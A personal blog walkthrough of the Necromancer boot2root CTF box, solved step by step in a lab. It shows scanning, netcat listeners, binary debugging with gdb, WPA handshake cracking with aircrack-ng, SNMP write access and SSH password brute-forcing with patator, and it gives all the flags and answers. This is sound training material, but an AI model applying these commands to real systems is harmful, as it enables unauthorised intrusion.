Long time no post, I got kinda busy the last days. This post is again not about malware hunting, which means not that I don’t hunt, I just cannot post about the last happenings and I also don’t want to. So I write about the next vulnerable operating system image which I resolved.
Table of contents
The penetrating was sometimes really frustrating, but I enjoyed it. You had to analysis network, reverse engineer, crack and google information. Hard but nice trip. So let’s start.
The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition.
There are 11 flags to collect on your way to solving the challenging, and the difficulty level is considered as beginner.
The end goal is simple... destroy The Necromancer!
Setup
I converted the image to a format which VMWare can read. I used ovftools here. Please read the documentation on how to use it. Then I set it up on my ESXi as FeeBSD 32bit. Connected to an internal network.
There is also a small Debian server for DHCP and DNS functions. And there is Kali Linux which I’m using to resolve the quests.
That’s the setup. Walk the path down now.
Flag #1
First we have to find out where the system is located at (via IP). So do a discover scan:
[email protected]:~# nmap -sP 10.0.0.0/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-24 23:03 CEST
Nmap scan report for 10.0.0.1
Host is up (0.00020s latency).
MAC Address: 00:50:56:65:6A:A8 (VMware)
Nmap scan report for 10.0.0.2
Host is up (0.00017s latency).
MAC Address: 00:0C:29:85:CF:BC (VMware)
Nmap scan report for 10.0.0.100
Host is up (0.000056s latency).
MAC Address: 00:0C:29:60:AA:78 (VMware)
Nmap scan report for 10.0.0.254
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.01 seconds
It’s on 10.0.0.100 so port scan it:
[email protected]:~# nmap -sS -sV 10.0.0.100
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-24 23:05 CEST
Nmap scan report for 10.0.0.100
Host is up (0.00026s latency).
All 1000 scanned ports on 10.0.0.100 are filtered
MAC Address: 00:0C:29:60:AA:78 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.52 seconds
No open ports, I also tested several other techniques, but they remain closed.
First time to while doing this CTF to think about it. So this VM has no open ports but we have to gain access to it, via network. Hmm 
What if it’s the other side? What if the VM sends data? So let’s start Wireshark and test it.
We see that the necromancer VM tries to connect to us on port 4444 with TCP protocol. It’s initiating a handshake sequence (which TCP connections normally do). Let’s listen on :444:
[email protected]:~/necromancer# nc -l -vv -p 4444
listening on [any] 4444 ...
10.0.0.100: inverse host lookup failed: Unknown host
connect to [10.0.0.254] from (UNKNOWN) [10.0.0.100] 45822
...V2VsY29tZSENCg0KWW91IGZpbmQgeW91cnNlbGYgc3RhcmluZyB0b3dhcmRzIHRoZSBob3Jpem9uLCB3aXRoIG5vdGhpbmcgYnV0IHNpbGVuY2Ugc3Vycm91bmRpbmcgeW91Lg0KWW91IGxvb2sgZWFzdCwgdGhlbiBzb3V0aCwgdGhlbiB3ZXN0LCBhbGwgeW91IGNhbiBzZWUgaXMgYSBncmVhdCB3YXN0ZWxhbmQgb2Ygbm90aGluZ25lc3MuDQoNClR1cm5pbmcgdG8geW91ciBub3J0aCB5b3Ugbm90aWNlIGEgc21hbGwgZmxpY2tlciBvZiBsaWdodCBpbiB0aGUgZGlzdGFuY2UuDQpZb3Ugd2FsayBub3J0aCB0b3dhcmRzIHRoZSBmbGlja2VyIG9mIGxpZ2h0LCBvbmx5IHRvIGJlIHN0b3BwZWQgYnkgc29tZSB0eXBlIG9mIGludmlzaWJsZSBiYXJyaWVyLiAgDQoNClRoZSBhaXIgYXJvdW5kIHlvdSBiZWdpbnMgdG8gZ2V0IHRoaWNrZXIsIGFuZCB5b3VyIGhlYXJ0IGJlZ2lucyB0byBiZWF0IGFnYWluc3QgeW91ciBjaGVzdC4gDQpZb3UgdHVybiB0byB5b3VyIGxlZnQuLiB0aGVuIHRvIHlvdXIgcmlnaHQhICBZb3UgYXJlIHRyYXBwZWQhDQoNCllvdSBmdW1ibGUgdGhyb3VnaCB5b3VyIHBvY2tldHMuLiBub3RoaW5nISAgDQpZb3UgbG9vayBkb3duIGFuZCBzZWUgeW91IGFyZSBzdGFuZGluZyBpbiBzYW5kLiAgDQpEcm9wcGluZyB0byB5b3VyIGtuZWVzIHlvdSBiZWdpbiB0byBkaWcgZnJhbnRpY2FsbHkuDQoNCkFzIHlvdSBkaWcgeW91IG5vdGljZSB0aGUgYmFycmllciBleHRlbmRzIHVuZGVyZ3JvdW5kISAgDQpGcmFudGljYWxseSB5b3Uga2VlcCBkaWdnaW5nIGFuZCBkaWdnaW5nIHVudGlsIHlvdXIgbmFpbHMgc3VkZGVubHkgY2F0Y2ggb24gYW4gb2JqZWN0Lg0KDQpZb3UgZGlnIGZ1cnRoZXIgYW5kIGRpc2NvdmVyIGEgc21hbGwgd29vZGVuIGJveC4gIA0KZmxhZzF7ZTYwNzhiOWIxYWFjOTE1ZDExYjlmZDU5NzkxMDMwYmZ9IGlzIGVuZ3JhdmVkIG9uIHRoZSBsaWQuDQoNCllvdSBvcGVuIHRoZSBib3gsIGFuZCBmaW5kIGEgcGFyY2htZW50IHdpdGggdGhlIGZvbGxvd2luZyB3cml0dGVuIG9uIGl0LiAiQ2hhbnQgdGhlIHN0cmluZyBvZiBmbGFnMSAtIHU2NjYi...
sent 0, rcvd 1424
Worked and we received some data. It looks like base64 to me, so test to decode it:
[email protected]:~/necromancer# echo "V2VsY29tZSENCg0KWW91IGZpbmQgeW91cnNlbGYgc3RhcmluZyB0b3dhcmRzIHRoZSBob3Jpem9uLCB3aXRoIG5vdGhpbmcgYnV0IHNpbGVuY2Ugc3Vycm91bmRpbmcgeW91Lg0KWW91IGxvb2sgZWFzdCwgdGhlbiBzb3V0aCwgdGhlbiB3ZXN0LCBhbGwgeW91IGNhbiBzZWUgaXMgYSBncmVhdCB3YXN0ZWxhbmQgb2Ygbm90aGluZ25lc3MuDQoNClR1cm5pbmcgdG8geW91ciBub3J0aCB5b3Ugbm90aWNlIGEgc21hbGwgZmxpY2tlciBvZiBsaWdodCBpbiB0aGUgZGlzdGFuY2UuDQpZb3Ugd2FsayBub3J0aCB0b3dhcmRzIHRoZSBmbGlja2VyIG9mIGxpZ2h0LCBvbmx5IHRvIGJlIHN0b3BwZWQgYnkgc29tZSB0eXBlIG9mIGludmlzaWJsZSBiYXJyaWVyLiAgDQoNClRoZSBhaXIgYXJvdW5kIHlvdSBiZWdpbnMgdG8gZ2V0IHRoaWNrZXIsIGFuZCB5b3VyIGhlYXJ0IGJlZ2lucyB0byBiZWF0IGFnYWluc3QgeW91ciBjaGVzdC4gDQpZb3UgdHVybiB0byB5b3VyIGxlZnQuLiB0aGVuIHRvIHlvdXIgcmlnaHQhICBZb3UgYXJlIHRyYXBwZWQhDQoNCllvdSBmdW1ibGUgdGhyb3VnaCB5b3VyIHBvY2tldHMuLiBub3RoaW5nISAgDQpZb3UgbG9vayBkb3duIGFuZCBzZWUgeW91IGFyZSBzdGFuZGluZyBpbiBzYW5kLiAgDQpEcm9wcGluZyB0byB5b3VyIGtuZWVzIHlvdSBiZWdpbiB0byBkaWcgZnJhbnRpY2FsbHkuDQoNCkFzIHlvdSBkaWcgeW91IG5vdGljZSB0aGUgYmFycmllciBleHRlbmRzIHVuZGVyZ3JvdW5kISAgDQpGcmFudGljYWxseSB5b3Uga2VlcCBkaWdnaW5nIGFuZCBkaWdnaW5nIHVudGlsIHlvdXIgbmFpbHMgc3VkZGVubHkgY2F0Y2ggb24gYW4gb2JqZWN0Lg0KDQpZb3UgZGlnIGZ1cnRoZXIgYW5kIGRpc2NvdmVyIGEgc21hbGwgd29vZGVuIGJveC4gIA0KZmxhZzF7ZTYwNzhiOWIxYWFjOTE1ZDExYjlmZDU5NzkxMDMwYmZ9IGlzIGVuZ3JhdmVkIG9uIHRoZSBsaWQuDQoNCllvdSBvcGVuIHRoZSBib3gsIGFuZCBmaW5kIGEgcGFyY2htZW50IHdpdGggdGhlIGZvbGxvd2luZyB3cml0dGVuIG9uIGl0LiAiQ2hhbnQgdGhlIHN0cmluZyBvZiBmbGFnMSAtIHU2NjYi" | base64 -d
Welcome!
You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.
The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right! You are trapped!
You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"
The first flag was obtained and I bet it’s md5. Let’s try to resolve it here: hashkiller.co.uk. It resolved to
opensesame
Flag #2
And when you look further, in the text is a hint written:
“Chant the string of flag1 - u666”
I think we have to send the string to port 666 on UDP of the machine:
[email protected]:~/necromancer# nc -uv 10.0.0.100 666
10.0.0.100: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.100] 666 (?) open
opensesame
A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}
As you stand to your feet you notice that you can no longer see the flicker of light in the distance.
You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.
As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.
666 is closed.
Flag 2 is:
1033750779
There is a hint with the number, I think it could also be a port, as the last hint was also containing a port number.
Flag #3
Yep, it worked. I looked in the source code of the site, but there where no useful hints etc. So let’s focus on the image and download it.
[email protected]:~/necromancer# file pileoffeathers.jpg
pileoffeathers.jpg: JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 640x290, frames 3
[email protected]:~/necromancer# LANG=C exif pileoffeathers.jpg
EXIF tags in 'pileoffeathers.jpg' ('Intel' byte order):
--------------------+----------------------------------------------------------
Tag |Value
--------------------+----------------------------------------------------------
X-Resolution |72
Y-Resolution |72
Resolution Unit |Inch
Exif Version |Exif Version 2.1
FlashPixVersion |FlashPix Version 1.0
Color Space |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------
Looks like an image, but look at the color space, it has an unknown value. So maybe it’s more than an image. Let’s check the strings.
I guess there is something embedded (feathers.txt):
[email protected]:~/necromancer# unzip -t pileoffeathers.jpg
Archive: pileoffeathers.jpg
warning [pileoffeathers.jpg]: 36994 extra bytes at beginning or within zipfile
(attempting to process anyway)
testing: feathers.txt OK
No errors detected in compressed data of pileoffeathers.jpg.
Let’s unpack it:
[email protected]:~/necromancer# unzip pileoffeathers.jpg
Archive: pileoffeathers.jpg
warning [pileoffeathers.jpg]: 36994 extra bytes at beginning or within zipfile
(attempting to process anyway)
inflating: feathers.txt
[email protected]:~/necromancer# ls
feathers.txt pileoffeathers.jpg
[email protected]:~/necromancer# cat feathers.txt
ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==
[email protected]:~/necromancer# cat feathers.txt | base64 -d
flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm
Hooray 
, we found the next flag! It resolves to
345465869
Hmm, a number, okay 
And a new hint, looks like part of a URI. Time to navigate to that.
Flag #4
The site showed that:
That was one of the hard parts of the CTF. I thought about it a long while. But then I mentioned the hint:
There must be a magical item that could protect you from the necromancer’s spell.
A “magical item”. Hmmmm.
index.php gave a 404. But could also a mod_rewrite. Maybe directory brute forcing would help as it did before with vulnOS’s. I searched a website with words of magic items and found a forum post. Then I used cewl to create a wordlist:
[email protected]:~/tools/dirsearch# cewl -v -w magic.txt -d 1 http://www.giantitp.com/forums/showsinglepost.php?p=10400652&postcount=1
cat magic.txt | tr a-z A-Z > magic_upper.txt; cat magic.txt | tr A-Z a-z > magic_lower.txt; cat magic_* >> magic.txt; rm magic_*
The last comment was to also create lower- and uppercase variations of the words and include them in the wordlist. Let’s let dirsearch do the job:
[email protected]:~/tools/dirsearch# ./dirsearch.py -u "http://10.0.0.100/amagicbridgeappearsatthechasm/" -e php -x 404,500,403 -w ~/tools/magic.txt -t 16
_|. _ _ _ _ _ _|_ v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 16 | Wordlist size: 10314
Error Log: /root/tools/dirsearch/logs/errors-16-09-29_22-35-48.log
Target: http://10.0.0.100/amagicbridgeappearsatthechasm/
[22:35:48] Starting:
[22:35:59] 200 - 9KB - /amagicbridgeappearsatthechasm/talisman
Task Completed
And then things went even worse. I downloaded talisman. It was a binary ELF file for x86 architecture (aka 32bit). I added the architecture to my amd64 Kali Linux:
sudo dpkg --add-architecture i386
sudo apt-get install libXX:i386
Reading the info from the ELF:
[email protected]:~/necromancer# readelf -h talisman
ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x8048350
Start of program headers: 52 (bytes into file)
Start of section headers: 8436 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 8
Size of section headers: 40 (bytes)
Number of section headers: 31
Section header string table index: 28
When running it:
[email protected]:~/necromancer# ./talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it's surface.
Do you want to wear the talisman? yes
Nothing happens.
I tried to search for useful strings inside the ELF, but no change, the strings where somehow protected. Kinda written to memory at runtime.
I looked at the sym.main call in radare2:
We see that sym.wearTalisman get’s called, and then it ends with a return.
At the called function was that:
There was also a function to read the strings, but it was protected with XOR . And I’m really not good in cracking these.
So I put the VM away, for a whole day.
…..
The story continues
Well, with static analysis I did not get far, so why not dynamic analysis and debug this ELF? I mainly did that on Windows with ollydbg. But this was Linux, and this was not a PE.
According to that I read about how to set breakpoints. But that did not get me further.
The file was not stripped during compiling, so some compiling information was still present. Also the function names remained the same as they are named in the source file. So I read this thread. And it got me on the right trail! 
gdb$ info functions
All defined functions:
Non-debugging symbols:
0x080482d0 _init
0x08048310 [email protected]
0x08048320 [email protected]
0x08048330 [email protected]
0x08048350 _start
0x08048380 __x86.get_pc_thunk.bx
0x08048390 deregister_tm_clones
0x080483c0 register_tm_clones
0x08048400 __do_global_dtors_aux
0x08048420 frame_dummy
0x0804844b unhide
0x0804849d hide
0x080484f4 myPrintf
0x08048529 wearTalisman
0x08048a13 main
0x08048a37 chantToBreakSpell
0x08049530 __libc_csu_init
0x08049590 __libc_csu_fini
0x08049594 _fini
Wohoo, see the function at 0x08048a37? chantToBreakSpell. This function got not called anywhere in the binary! And according to that I can use call to run a function.
gdb$ b main
Breakpoint 1 at 0x8048a21
gdb$ call chantToBreakSpell()
You can't do that without a process to debug.
gdb$ run
Starting program: /root/necromancer/talisman
--------------------------------------------------------------------------[regs]
EAX: 0xF7FB0DBC EBX: 0x00000000 ECX: 0xFFFFD3A0 EDX: 0xFFFFD3C4 o d I t S z a P c
ESI: 0xF7FAF000 EDI: 0xF7FAF000 EBP: 0xFFFFD388 ESP: 0xFFFFD384 EIP: 0x08048A21
CS: 0023 DS: 002B ES: 002B FS: 0000 GS: 0063 SS: 002B
--------------------------------------------------------------------------[code]
=> 0x8048a21 <main+14>: sub esp,0x4
0x8048a24 <main+17>: call 0x8048529 <wearTalisman>
0x8048a29 <main+22>: mov eax,0x0
0x8048a2e <main+27>: add esp,0x4
0x8048a31 <main+30>: pop ecx
0x8048a32 <main+31>: pop ebp
0x8048a33 <main+32>: lea esp,[ecx-0x4]
0x8048a36 <main+35>: ret
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048a21 in main ()
gdb$ call chantToBreakSpell()
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$1 = 0xffffd072
Oh YES YES YES. There it is, the flag. And cracked it is:
blackmagic
Yup, this really was black magic.
Flag 5
The hint
Chant these words at u31337
was pointing to it. Again we have to send a string to a port of the machine via UDP.
[email protected]:~/necromancer# nc -u 10.0.0.100 31337
blackmagic
As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until.... silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.
/thenecromancerwillabsorbyoursoul
flag5{0766c36577af58e15545f099a3b15e60}
And the next flag was obtained, this time it resolved to
809472671
Again some numbers, if they might help us later?
Flag 6
The last text gave us another hint: /thenecromancerwillabsorbyoursoul, so let’s open that URL:
Next flag obtained! It resolves to:
1756462165
Flag 7
The site is containing a file to download and a hint:
Looking closer at the skull, you can see u161 engraved into the forehead.
Seems like the next UDP driven port to where we have to send a request. But lets focus on the downloaded file first.
[email protected]:~/necromancer# file necromancer
necromancer: bzip2 compressed data, block size = 900k
[email protected]:~/necromancer# bunzip2 necromancer
bunzip2: Can't guess original name for necromancer -- using necromancer.out
[email protected]:~/necromancer# file necromancer.out
necromancer.out: POSIX tar archive (GNU)
[email protected]:~/necromancer# tar xfv necromancer.out
necromancer.cap
A network capture file. This seems interesting. Let’s open it in Wireshark
We see here IEEE 802.11 WiFi traffic. And that there is a beacon frame for the SSID community. Scrolling further we see also some deauth packets. Let’s see if we see also a captured handshake.
Yep, we do. Now we have to break it.
I am using the rockyou.txt wordlist as it has a good success ratio. We need also the BSSID of the Access Point. Look into the packet and see for the QoS Data, you will find it there. The BSSID here is c4:12:f5:0d:5e:95.
With used command:
aircrack-ng -b c4:12:f5:0d:5e:95 -w rockyou.txt necromancer.cap
We have the password! Let’s send that to the mentioned port from before.
# nc -u -v 10.0.0.100 161
10.0.0.100: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.100] 161 (snmp) open
death2all
Okay, that was a fail. Nothing happens. Would be too easy, eh 
Let’s look at the protocol, SNMP. Kali has a tool included to check a SNMP service: snmpcheck. So:
[email protected]:~/necromancer# snmpcheck -t 10.0.0.100
test: .1.3.6.1.4.1.2021.2.1
suff: .2.1
test: .1.3.6.1.4.1.2021.4
suff:
test: .1.3.6.1.4.1.2021.8.1
suff: .8.1
test: .1.3.6.1.4.1.2021.9.1
suff: .9.1
test: .1.3.6.1.4.1.2021.10.1
suff: .10.1
test: .1.3.6.1.4.1.2021.101
suff:
Created directory: /var/lib/snmp/mib_indexes
No community name specified.
No community name specified.
Hmm, ok. What is that? According to that it’s somehow a password. Feed it with that. But again an error. Let’s just simply use snmpwalk instead of snmpcheck:
[email protected]:~/necromancer# snmpwalk -c death2all -v 2c 10.0.0.100
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
iso.3.6.1.2.1.1.6.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
Ok, we have some info. There is a next hint:
iso.3.6.1.2.1.1.6.0 = STRING: “Locked - death2allrw!”
Looks like an SNMP OID. And death2allrw. rw? Read and write? Let’s try to set it on that OID:
[email protected]:~/necromancer# snmpset -c death2allrw 10.0.0.100 iso.3.6.1.2.1.1.6.0 s Unlocked
snmpset: No securityName specified
[email protected]:~/necromancer# snmpset -c death2allrw -v 1 10.0.0.100 iso.3.6.1.2.1.1.6.0 s Unlocked
iso.3.6.1.2.1.1.6.0 = STRING: "Unlocked"
Version 1 don’t need a securityName. Tickle it again:
[email protected]:~/necromancer# snmpwalk -c death2all -v 2c 10.0.0.100
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"
iso.3.6.1.2.1.1.6.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
There we are! The next flag was obtained. And resolves to:
demonslayer
That as a really hard flag, kinda! Let’s walk on to gain the next.
Flag 8-10
The last hint was t22. So, TCP on 22? Is SSH finally open? Checking it:
[email protected]:~/necromancer# nmap -sS -sV 10.0.0.100
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-01 21:20 CEST
Nmap scan report for 10.0.0.100
Host is up (0.00023s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (protocol 2.0)
MAC Address: 00:0C:29:60:AA:78 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.25 seconds
Wohoo, it’s open 
[email protected]:~/necromancer# ssh [email protected]
The authenticity of host '10.0.0.100 (10.0.0.100)' can't be established.
ECDSA key fingerprint is SHA256:sIaywVX5Ba0Qbo/sFM3Gf9cY9SMJpHk2oTZmOHKTtLU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.0.100' (ECDSA) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Login with root password demonslayer was false. Maybe demonslayer is the username? But what is the password? Let’s ask rockyou.txt:
[email protected]:~/necromancer# patator ssh_login host=10.0.0.100 port=22 user=demonslayer password=FILE0 0=rockyou.txt -x ignore:mesg='Authentication failed.'
16:49:07 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2016-10-08 16:49 CEST
16:49:09 patator INFO -
16:49:09 patator INFO - code size time | candidate | num | mesg
16:49:09 patator INFO - -----------------------------------------------------------------------------
16:49:11 patator INFO - 0 19 0.633 | 12345678 | 9 | SSH-2.0-OpenSSH_7.2
^C16:49:13 patator INFO - Hits/Done/Skip/Fail/Size: 1/101/0/0/14344391, Avg: 21 r/s, Time: 0h 0m 4s
16:49:13 patator INFO - To resume execution, pass --resume 13,7,11,9,11,12,9,8,9,12
Password is found, it’s 12345678. Access the machine:
[email protected]:~/necromancer# ssh [email protected]
[email protected]'s password:
. .
.n . . n.
. .dP dP 9b 9b. .
4 qXb . dX Xb . dXp t
dX. 9Xb .dXb __ __ dXb. dXP .Xb
9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX' `98v8P' `XXP' `9XXXXXXXXXXXP'
~~~~~~~ 9X. .db|db. .XP ~~~~~~~
)b. .dbo.dP'`v'`9b.odb. .dX(
,dXXXXXXXXXXXb dXXXXXXXXXXXb.
dXXXXXXXXXXXP' . `9XXXXXXXXXXXb
dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb
9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP
`' 9XXXXXX( )XXXXXXP `'
XXXX X.`v'.X XXXX
XP^X'`b d'`X^XX
X. 9 ` ' P )X
`b ` ' d'
` '
THE NECROMANCER!
by @xerubus
$ id
uid=1000(demonslayer) gid=1000(demonslayer) groups=1000(demonslayer)
$ ls
flag8.txt
$ cat flag8.txt You enter the Necromancer's Lair!
A stench of decay fills this place.
Jars filled with parts of creatures litter the bookshelves.
A fire with flames of green burns coldly in the distance.
Standing in the middle of the room with his back to you is the Necromancer.
In front of him lies a corpse, indistinguishable from any living creature you have seen before.
He holds a staff in one hand, and the flickering object in the other.
"You are a fool to follow me here! Do you not know who I am!"
The necromancer turns to face you. Dark words fill the air!
"You are damned already my friend. Now prepare for your own death!"
Defend yourself! Counter attack the Necromancer's spells at u777!
$
Port 777 on UDP, shall we also connect to there?
[email protected]:~# nc -v -u 10.0.0.100 777
10.0.0.100: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.100] 777 (?) open
.
Nothing happens. If you scroll up, after every step the port got closed. But 22 remains open. Maybe we have to connect to 777 there?
$ whereis nc
/usr/bin/nc
$ nc -u localhost 777
.
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
A riddle? Let’s see what happens when you fail.
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 2 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 1 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 0 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
!!!!!!! You have been defeated by The Necromancer! (*_*) !!!!!!!
Connection to 10.0.0.100 closed by remote host.
Connection to 10.0.0.100 closed.
Damnit, the port got closed, my SSH session got closed and it seems that I have to do all the tasks again. Let’s redo this walkthrough then.
Let’s use Google then:
$ nc -u localhost 777
.
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path? Kelewan
flag8{55a6af2ca3fee9f2fef81d20743bda2c}
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Who did Johann Faust VIII make a deal with? Mephistopheles
flag9{713587e17e796209d1df4c9c2c2d2966}
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Who is tricked into passing the Ninth Gate? Hedge
flag10{8dc6486d2c63cafcdc6efbba2be98ee4}
A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.
^C
First answer can be found at this Wikipedia article. The second answer is known to everyone who read Faust. I had to read it in school, you maybe, too. If not, read it! It’s a really nice story. Third answer can be found here.
The flags are:
55a6af2ca3fee9f2fef81d20743bda2c MD5 : Kelewan
713587e17e796209d1df4c9c2c2d2966 MD5 : Mephistopheles
8dc6486d2c63cafcdc6efbba2be98ee4 MD5 : Hedge
Appears the flag are the answers to the riddle. Move on.
Flag 11
Last flag. Let’s see at the text of the last ones.
On the ground is a small vile.
List all files in the current directory:
$ ls -al
total 44
drwxr-xr-x 3 demonslayer demonslayer 512 Oct 9 01:17 .
drwxr-xr-x 3 root wheel 512 May 11 18:25 ..
-rw-r--r-- 1 demonslayer demonslayer 87 May 11 18:25 .Xdefaults
-rw-r--r-- 1 demonslayer demonslayer 773 May 11 18:25 .cshrc
-rw-r--r-- 1 demonslayer demonslayer 103 May 11 18:25 .cvsrc
-rw-r--r-- 1 demonslayer demonslayer 359 May 11 18:25 .login
-rw-r--r-- 1 demonslayer demonslayer 175 May 11 18:25 .mailrc
-rw-r--r-- 1 demonslayer demonslayer 218 May 11 18:25 .profile
-rw-r--r-- 1 demonslayer demonslayer 196 Oct 9 01:17 .smallvile
drwx------ 2 demonslayer demonslayer 512 May 11 18:25 .ssh
-rw-r--r-- 1 demonslayer demonslayer 706 May 11 21:19 flag8.txt
File .smallvile attracted my interest. Looking what is inside:
$ cat .smallvile
You pick up the small vile.
Inside of it you can see a green liquid.
Opening the vile releases a pleasant odour into the air.
You drink the elixir and feel a great power within your veins!
Hmm, great power? Let’s test it.
$ id
uid=1000(demonslayer) gid=1000(demonslayer) groups=1000(demonslayer)
I am still not 0. Maybe sudo works?
$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"
User demonslayer may run the following commands on thenecromancer:
(ALL) NOPASSWD: /bin/cat /root/flag11.txt
Ok, that is the great power. Let’s open the last flag.
$ sudo /bin/cat /root/flag11.txt
Suddenly you feel dizzy and fall to the ground!
As you open your eyes you find yourself staring at a computer screen.
Congratulations!!! You have conquered......
. .
.n . . n.
. .dP dP 9b 9b. .
4 qXb . dX Xb . dXp t
dX. 9Xb .dXb __ __ dXb. dXP .Xb
9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
